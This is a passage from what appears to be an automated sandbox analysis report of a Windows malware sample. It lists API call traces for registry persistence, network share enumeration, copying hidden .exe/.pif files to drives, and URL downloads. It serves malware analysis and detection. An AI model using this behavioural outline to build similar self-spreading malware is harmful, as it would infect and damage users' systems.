8f6687-8f6693 1219->1225 1220->1219 1223 8f6621 1220->1223 1223->1215 1224->1225 1230 8f6665-8f666f 1224->1230 1225->1207 1230->1225 1231 8f6671-8f667b 1230->1231 1231->1225 1233 8f667d 1231->1233 1233->1225 1235->1151
                                                                                                            APIs
                                                                                                            • RtlEnterCriticalSection.NTDLL(00909050), ref: 008F63CD
                                                                                                            • IsBadWritePtr.KERNEL32(?,-00000008), ref: 008F6741
                                                                                                            • wsprintfA.USER32 ref: 008F67A0
                                                                                                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008F67B7
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F686F
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 008F6883
                                                                                                            • RtlLeaveCriticalSection.NTDLL(00909050), ref: 008F6960
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalGlobalSection$AllocEnterFreeLeaveWritelstrlenwsprintf
                                                                                                            • String ID: purity_control_%x$purity_control_%x
                                                                                                            • API String ID: 2588801185-2962537068
                                                                                                            • Opcode ID: c58f97efcd79e20a91049637bae17f794d909c672dd19c66dea4bcb523d109c0
                                                                                                            • Instruction ID: b849127a8a4b62ddc079126e6f9644ce1690bd45495e2225dd0cafc0abaaef15
                                                                                                            • Opcode Fuzzy Hash: c58f97efcd79e20a91049637bae17f794d909c672dd19c66dea4bcb523d109c0
                                                                                                            • Instruction Fuzzy Hash: E6026EB190421C9BCB20CF64CC94FEA7B75FF95344F0482A9E649DB241E772AA90CF90

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1236 8f5760-8f57e1 1237 8f57ec 1236->1237 1238 8f57e3-8f57ea 1236->1238 1240 8f5c01-8f5c05 1237->1240 1238->1237 1239 8f57f1-8f5825 lstrcpy RegOpenKeyExA 1238->1239 1241 8f5827-8f582b 1239->1241 1242 8f5854-8f5858 1239->1242 1243 8f582d 1241->1243 1244 8f5832-8f584d RegCreateKeyA 1241->1244 1245 8f585e-8f5868 1242->1245 1246 8f5a4b-8f5a89 1242->1246 1243->1240 1244->1242 1247 8f584f 1244->1247 1248 8f5872-8f589e RegEnumValueA 1245->1248 1250 8f5a8f-8f5a99 1246->1250 1251 8f5beb-8f5bf2 1246->1251 1247->1240 1252 8f58d4-8f590b 1248->1252 1253 8f58a0-8f58a9 1248->1253 1250->1251 1254 8f5a9f-8f5aca 1250->1254 1251->1240 1258 8f5bf4-8f5bfb RegCloseKey 1251->1258 1260 8f5a46 1252->1260 1261 8f5911-8f5923 1252->1261 1255 8f58ad-8f58d2 RegDeleteValueA 1253->1255 1256 8f58ab 1253->1256 1264 8f5bd9-8f5be6 1254->1264 1265 8f5ad0-8f5b35 wsprintfA RegQueryValueExA 1254->1265 1255->1248 1256->1252 1258->1240 1260->1251 1262 8f5935 1261->1262 1263 8f5925-8f5933 1261->1263 1262->1260 1263->1262 1266 8f593a-8f5944 1263->1266 1264->1251 1267 8f5b37-8f5b41 1265->1267 1268 8f5b46-8f5b82 1265->1268 1269 8f5955-8f595c 1266->1269 1267->1264 1270 8f5bd4 1268->1270 1271 8f5b84-8f5b8a 1268->1271 1273 8f5962-8f59ae wsprintfA 1269->1273 1274 8f5a41 1269->1274 1270->1264 1275 8f5bc5-8f5bd1 1271->1275 1276 8f5bb4-8f5bc3 1271->1276 1277 8f5b91-8f5b9f 1271->1277 1278 8f5ba1-8f5bb2 1271->1278 1279 8f5a01-8f5a3c RegSetValueExA 1273->1279 1280 8f59b0-8f59b6 1273->1280 1274->1260 1275->1270 1276->1270 1277->1270 1278->1270 1285 8f5946-8f594f 1279->1285 1280->1275 1280->1276 1280->1277 1280->1278 1281 8f59bd-8f59cb 1280->1281 1282 8f59cd-8f59df 1280->1282 1283 8f59f2-8f59fb 1280->1283 1284 8f59e1-8f59f0 1280->1284 1281->1279 1282->1279 1283->1279 1284->1279 1285->1269
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(00000000,Software\Msoga), ref: 008F57FD
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 008F581D
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 008F5845
                                                                                                            • RegEnumValueA.KERNEL32(00000000,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 008F5896
                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 008F5BFB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateEnumOpenValuelstrcpy
                                                                                                            • String ID: %c%d_%d$%c%d_%d$Software\Msoga$joneC:\Windows\
                                                                                                            • API String ID: 4133318789-2016879794
                                                                                                            • Opcode ID: 092e80cd27dcf92a7fe675b1ba65eaef3025a7c156c0effb591b2b8f2738b628
                                                                                                            • Instruction ID: ce6bf6037a2497ca3fa7c477af45129ff5299365b34885a49073fffff96912ba
                                                                                                            • Opcode Fuzzy Hash: 092e80cd27dcf92a7fe675b1ba65eaef3025a7c156c0effb591b2b8f2738b628
                                                                                                            • Instruction Fuzzy Hash: 95C1F67090562CEBDB24CF64DC88BE9B7B5FB58314F2082D9D60AA6250D7749EC5CF90

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 0090457F
                                                                                                            • WSAStartup.WS2_32(00000002,?), ref: 0090458E
                                                                                                            • RtlInitializeCriticalSection.NTDLL(00909030), ref: 00904599
                                                                                                            • RtlInitializeCriticalSection.NTDLL(00909018), ref: 009045A4
                                                                                                            • RtlInitializeCriticalSection.NTDLL(00909050), ref: 009045AF
                                                                                                              • Part of subcall function 00903B60: LoadLibraryA.KERNEL32(008F2154), ref: 00903C13
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F278C), ref: 00903C36
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F27A0), ref: 00903C4E
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F27B0), ref: 00903C67
                                                                                                              • Part of subcall function 00903B60: LoadLibraryA.KERNEL32(008F2894), ref: 00903C79
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28D8), ref: 00903C9C
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28B0), ref: 00903CB5
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28C4), ref: 00903CCD
                                                                                                              • Part of subcall function 00903B60: GetProcAddress.KERNEL32(00000000,008F28A0), ref: 00903CE6
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000327D4,00000000,00000000,00000000), ref: 009045D2
                                                                                                              • Part of subcall function 008F41C6: RtlEnterCriticalSection.NTDLL(00909030), ref: 008F41D6
                                                                                                              • Part of subcall function 008F41C6: RtlLeaveCriticalSection.NTDLL(00909030), ref: 008F4260
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00029EEA,00000000,00000000,?), ref: 009045F9
                                                                                                              • Part of subcall function 008F41C6: CloseHandle.KERNEL32(00000000), ref: 008F4247
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0003392D,00000000,00000000,?), ref: 00904620
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00028962,00000000,00000000,?), ref: 00904647
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002A2F5,00000000,00000000,?), ref: 0090466E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002426A,00000000,00000000,?), ref: 00904695
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00027A3A,00000000,00000000,?), ref: 009046BC
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000283C9,00000000,00000000,?), ref: 009046E3
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_0002878B,00000000,00000000,?), ref: 0090470A
                                                                                                            • Sleep.KERNEL32(00000200), ref: 00904727
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateThread$AddressProc$CriticalSection$Initialize$LibraryLoad$CloseEnterErrorHandleLeaveModeSleepStartup
                                                                                                            • String ID:
                                                                                                            • API String ID: 3135310872-0
                                                                                                            • Opcode ID: af16f2998d0a13522ffdaaaf0dcbf464f6386a0af0635ce21c06d9e9d6f1ebe9
                                                                                                            • Instruction ID: 04fecc9a656ce15dd7de044a2455e3667314d167c5ee8c79cfb52d6e2c895bcf
                                                                                                            • Opcode Fuzzy Hash: af16f2998d0a13522ffdaaaf0dcbf464f6386a0af0635ce21c06d9e9d6f1ebe9
                                                                                                            • Instruction Fuzzy Hash: 1E41AC72BC13447BFA20A7E09C1FFEA3728AB54F01F600156B709FD1D1AAF46584866A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: fprintf$exitfcloseferrorfopenfreadprintf
                                                                                                            • String ID: %08lX$%08lX$error closing file "%s"!$error opening file "%s"!
                                                                                                            • API String ID: 2944818142-1845245923
                                                                                                            • Opcode ID: e36d5907007ee0041133627587ae2a60bef19a6af6977e502c7b128faa41c581
                                                                                                            • Instruction ID: d5546c47a0f02ada54b3eb7de5c41582f6d8601c2005f4542d6517f97f497720
                                                                                                            • Opcode Fuzzy Hash: e36d5907007ee0041133627587ae2a60bef19a6af6977e502c7b128faa41c581
                                                                                                            • Instruction Fuzzy Hash: B54144B1E00108EBDB04DBA8D985BAE77B9AB08318F104576F615FB7D0E239AE409759
                                                                                                            APIs
                                                                                                            • WNetEnumResourceA.MPR(?,?,?,?), ref: 00901A92
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00901B29
                                                                                                            • lstrcat.KERNEL32(?,008F3D50), ref: 00901B38
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 00901B76
                                                                                                            • lstrlen.KERNEL32(?), ref: 00901B83
                                                                                                            • lstrcat.KERNEL32(?,008F3D54), ref: 00901BA2
                                                                                                            • lstrlen.KERNEL32(?), ref: 00901BAF
                                                                                                            • lstrcat.KERNEL32(?,.tmp), ref: 00901BD1
                                                                                                            • lstrlen.KERNEL32(?,?,00000001,?,?,00000000), ref: 00901C2C
                                                                                                              • Part of subcall function 00901060: Sleep.KERNEL32(?,?), ref: 009010BF
                                                                                                              • Part of subcall function 00901060: lstrcat.KERNEL32(?,008F3D20), ref: 009010DD
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00901C4B
                                                                                                            • Sleep.KERNEL32(00001000), ref: 00901C71
                                                                                                            • Sleep.KERNEL32(00002000), ref: 00901C92
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcat$Sleeplstrlen$lstrcpy$DeleteEnumFileResource
                                                                                                            • String ID: .tmp
                                                                                                            • API String ID: 3940331287-2986845003
                                                                                                            • Opcode ID: c8e7e2777de983ac017571e66ce5cbb3efc11308a5f60ca671fa1775e849b863
                                                                                                            • Instruction ID: 777ba9b9690906ec5f26ccb3f20416f4b34d4d00e51372c18f27bd96866f26ae
                                                                                                            • Opcode Fuzzy Hash: c8e7e2777de983ac017571e66ce5cbb3efc11308a5f60ca671fa1775e849b863
                                                                                                            • Instruction Fuzzy Hash: A2418C75A00628AFDF24DF64DC89FAB7B79BF44302F408588E50997191D735DA86CF50
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00004E20), ref: 00903210
                                                                                                            • GetLogicalDrives.KERNEL32 ref: 00903220
                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 009032A3
                                                                                                            • lstrcat.KERNEL32(?,008F2740), ref: 009032CA
                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000020,00000000), ref: 009032E6
                                                                                                            • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 0090331B
                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0090332F
                                                                                                            • ReadFile.KERNEL32(?,?,00000FA0,?,00000000), ref: 00903391
                                                                                                            • CharLowerA.USER32(?), ref: 0090339E
                                                                                                            • lstrlen.KERNEL32(?), ref: 009033AB
                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00903479
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 00903486
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00903498
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 009034B4
                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 009034E7
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 009034F4
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 00903503
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0090351C
                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 00903529
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000020), ref: 00903547
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00903554
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0090357F
                                                                                                            • GetSystemTime.KERNEL32(?), ref: 0090359F
                                                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 009035C8
                                                                                                            • lstrcat.KERNEL32(?,.pif), ref: 0090362B
                                                                                                            • lstrcat.KERNEL32(?,.exe), ref: 0090363F
                                                                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0090366B
                                                                                                            • WriteFile.KERNEL32(?,?,00000000), ref: 00903680
                                                                                                            • SetFileTime.KERNEL32(?,?,?,?), ref: 009036A2
                                                                                                            • CloseHandle.KERNEL32(?), ref: 009036AF
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 009036BE
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 009036DA
                                                                                                            • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 0090370D
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 0090371A
                                                                                                            • SetFileAttributesA.KERNEL32(?,00000007), ref: 00903729
                                                                                                            • Sleep.KERNEL32(00001B58), ref: 00903739
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Time$Attributes$CloseHandle$Create$SystemWritelstrcat$Sleeplstrlen$CharDeleteDriveDrivesLogicalLowerReadTypelstrcpy
                                                                                                            • String ID: :$\
                                                                                                            • API String ID: 3104407473-1166558509
                                                                                                            • Opcode ID: df6b5775977628b4a81a40ce4545df522d85cbae3d523c863cf7caf099063947
                                                                                                            • Instruction ID: 88b04b89ff2d5d49c9b544c0c1509a14f8c558021219009753e2849a164152cb
                                                                                                            • Opcode Fuzzy Hash: df6b5775977628b4a81a40ce4545df522d85cbae3d523c863cf7caf099063947
                                                                                                            • Instruction Fuzzy Hash: 13517B759006A99FDF24DB64CC84AEEB77ABF85301F0482D9E109EA190E7349FA5CF10
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00001000,?,?,?,00000000,00908090,008F3FF8,000000FF,?,00903AFC,80000001), ref: 009017D9
                                                                                                            • wsprintfA.USER32 ref: 009017F8
                                                                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0090181A
                                                                                                            • RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,000000FF), ref: 00901894
                                                                                                            • lstrlen.KERNEL32(?), ref: 009018C4
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 009018D0
                                                                                                            • Sleep.KERNEL32(00000400), ref: 00901912
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00901928
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleeplstrlen$CloseEnumOpenValuewsprintf
                                                                                                            • String ID: %s%s
                                                                                                            • API String ID: 1665585142-3252725368
                                                                                                            • Opcode ID: 105b3b7216370df613b9403cc64fd3796491085e6bbce759a8dd1eb534b20b62
                                                                                                            • Instruction ID: f291d40bf82c4f37e04c909cb87568799dd871c4c3652266a07307bda0cbfd66
                                                                                                            • Opcode Fuzzy Hash: 105b3b7216370df613b9403cc64fd3796491085e6bbce759a8dd1eb534b20b62
                                                                                                            • Instruction Fuzzy Hash: C7515371D01218AFDB20DBA4DC98BEAB7B8FF48704F004699E619A7290DB795A84CF50
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(C:\Windows\npqqe.log,80000000,00000001,00000000,00000003,00000080,00000000), ref: 008F5637
                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 008F5659
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 008F5691
                                                                                                            • ReadFile.KERNEL32(000000FF,00000000,00000400,00000000,00000000), ref: 008F56BB
                                                                                                            • lstrcpy.KERNEL32(00000000,C:\Windows\npqqe.log), ref: 008F56CD
                                                                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 008F56E1
                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 008F5725
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 008F5755
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Global$AllocCloseCreateFreeHandleReadSizelstrcpylstrlen
                                                                                                            • String ID: C:\Windows\npqqe.log
                                                                                                            • API String ID: 1499523542-2406171112
                                                                                                            • Opcode ID: 13410aa29157c4a09d8bb0631ec8ae28d6552e0e3714c8ddacdd88b8512230e7
                                                                                                            • Instruction ID: 7b4cec933094a5ba58c473e8fa1571a979cd2937148eca509dbf3714df0e54f5
                                                                                                            • Opcode Fuzzy Hash: 13410aa29157c4a09d8bb0631ec8ae28d6552e0e3714c8ddacdd88b8512230e7
                                                                                                            • Instruction Fuzzy Hash: A94168B594022CEBDF20DBA4CC8DBDAB778BB54300F1046D9E319A6291DBB51AC4CF90
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA599
                                                                                                            • GetPrivateProfileStringA.KERNEL32(008F2114,008F2660,00000000,00000000,00000080,008F26C0), ref: 008FA5C5
                                                                                                            • lstrlen.KERNEL32(00000000), ref: 008FA5D2
                                                                                                            • GetTickCount.KERNEL32 ref: 008FA5EA
                                                                                                            • wsprintfA.USER32 ref: 008FA635
                                                                                                            • WritePrivateProfileStringA.KERNEL32(008F2114,008F2660,?,008F26C0), ref: 008FA65A
                                                                                                            • lstrcpy.KERNEL32(44775622570,00000000), ref: 008FA66C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
                                                                                                            • String ID: 44775622570
                                                                                                            • API String ID: 929466507-1790008869
                                                                                                            • Opcode ID: 8607d8001ddd7752c23b5e6db4bc445f8d45a353c2c5056ef63a4107122de7a6
                                                                                                            • Instruction ID: 5aa36b9e2144a2f8f87b43ec2cdedc7b132630724fb17c91ab5f9e34fb82f1bc
                                                                                                            • Opcode Fuzzy Hash: 8607d8001ddd7752c23b5e6db4bc445f8d45a353c2c5056ef63a4107122de7a6
                                                                                                            • Instruction Fuzzy Hash: 4A315176601119BFDF14DB64EC48BE677B9FF58700F00829AF209D32A1DE749A848F51
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(0002BF20), ref: 008F8A14
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • Sleep.KERNEL32 ref: 008F8A33
                                                                                                            • IsBadWritePtr.KERNEL32(00000110,00000000), ref: 008F8B3E
                                                                                                            • Sleep.KERNEL32(00001770), ref: 008F8B8E
                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 008F8BB0
                                                                                                            • Sleep.KERNEL32(0043001E), ref: 008F8D9D
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F8DD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ExchangeExitInterlockedThreadUserWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 702981705-0
                                                                                                            • Opcode ID: 0237020418c31704ff51f7c1d85761e917a88a5eb53a7b6fda92098638a7540f
                                                                                                            • Instruction ID: 72e479733f7a582814d265fbc32a47169135fcddf4e88b798f9b770cd47bce06
                                                                                                            • Opcode Fuzzy Hash: 0237020418c31704ff51f7c1d85761e917a88a5eb53a7b6fda92098638a7540f
                                                                                                            • Instruction Fuzzy Hash: 0EB18FB1A0512CCBCB24DB64CC947BAB7B5FF44304F1085EAE609A6281DB356EC4CF99
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 009009A3
                                                                                                              • Part of subcall function 008FA677: GetTickCount.KERNEL32 ref: 008FA6C5
                                                                                                              • Part of subcall function 008FA677: GetTickCount.KERNEL32 ref: 008FA6E6
                                                                                                              • Part of subcall function 008FA677: lstrlen.KERNEL32(?,008F26B8,00000000), ref: 008FA6F8
                                                                                                              • Part of subcall function 008FA677: wsprintfA.USER32 ref: 008FA704
                                                                                                            • InternetOpenA.WININET(008F2120,00000001,00000000,00000000,00000000), ref: 00900A18
                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 00900A4A
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00900A7F
                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00900AA5
